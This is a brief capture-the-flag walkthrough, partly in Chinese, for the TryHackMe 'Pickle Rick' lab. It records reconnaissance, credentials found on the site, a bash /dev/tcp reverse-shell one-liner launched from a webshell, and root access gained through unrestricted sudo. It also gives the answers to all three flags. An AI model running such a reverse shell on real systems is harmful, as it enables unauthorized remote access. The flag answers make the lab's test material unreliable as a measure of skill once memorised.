URL : https://tryhackme.com/room/picklerick
IP: 10.10.223.99

Recon

  • nmap -A 10.10.223.99
  • 22 port
  • 80 port首頁原始碼-
  • 提示 username : R1ckRul3srobots.txt-
  • Wubbalubbadubdub

Login

  • 使用 Username : R1ckRul3s
  • Password : Wubbalubbadubdub

Webshell

  • 進入後就是一個 webshell戳成 reverse shellbash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'Flag1-
  • 在 web 目錄
  • mr. meeseek hairFlag2-
  • 在 rick 家目錄
  • 1 jerry tearFlag3-
  • 發現可以直接 sudo su
  • 所以就進 root 取得最後一個 flag
  • fleeb juice